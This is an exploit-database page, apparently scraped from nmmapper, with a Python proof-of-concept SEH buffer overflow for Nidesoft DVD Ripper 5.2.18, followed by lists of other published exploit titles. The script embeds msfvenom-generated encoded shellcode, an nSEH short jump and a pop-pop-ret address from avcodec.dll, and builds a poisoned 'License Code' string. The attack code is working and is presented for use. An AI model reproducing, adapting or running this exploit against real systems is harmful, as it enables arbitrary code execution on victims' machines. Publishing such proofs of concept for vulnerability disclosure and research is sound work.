To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)"

Author

Exploit author

"Felipe Winsnes"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-07-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
# Date: 2020-07-26
# Author: Felipe Winsnes
# Software Link: https://nidesoft-dvd-ripper.softonic.com/
# Version: 5.2.18
# Tested on: Windows 7 (x86)

# Blog: https://whitecr0wz.github.io/

# Proof of Concept:
# 1.- Run the python script, it will create the file "poc.txt".
# 2.- Copy the content of the new file "poc.txt" to clipboard
# 3.- Open the application.
# 4.- Paste the clipboard into the "License Code" parameter within registration.
# 5.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d"                                                                                                            
# Payload size: 448 bytes

buf =  b""
buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c"
buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55"
buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c"
buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b"
buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55"
buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52"
buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38"
buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42"
buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54"
buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61"
buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77"
buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54"
buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f"
buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30"
buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73"
buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68"
buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30"
buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b"
buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77"
buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a"
buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e"
buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51"
buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30"
buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f"
buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65"
buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45"
buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69"
buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42"
buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71"
buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38"
buf += b"\x53\x55\x65\x50\x41\x41"

nseh = "\xEB\x11\x41\x41"
seh = struct.pack("<I", 0x6678336D) #  0x6678336d : pop ebx # pop esi # ret  | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_WRITECOPY} [avcodec.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Nidesoft Studio\Nidesoft DVD Ripper 5\avcodec.dll)

buffer = "A" * 6008 + nseh + seh + "A" * 11 + buf + "\xff" * 200

f = open ("poc.txt", "w")
f.write(buffer)
f.close()
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-11-12 "Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow" local windows "Felipe Winsnes"
2020-09-09 "Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)" local windows "Felipe Winsnes"
2020-07-26 "Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)" local windows "Felipe Winsnes"
2020-07-26 "Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)" dos windows "Felipe Winsnes"
2020-07-23 "FTPDummy 4.80 - Local Buffer Overflow (SEH)" local windows "Felipe Winsnes"
2020-06-08 "Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)" local windows "Felipe Winsnes"
2020-04-22 "RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)" local windows "Felipe Winsnes"
2020-04-06 "Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)" local windows "Felipe Winsnes"
2020-03-27 "Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)" local windows "Felipe Winsnes"
2020-03-25 "10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path" local windows "Felipe Winsnes"
2020-03-25 "10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)" local windows "Felipe Winsnes"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48687/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.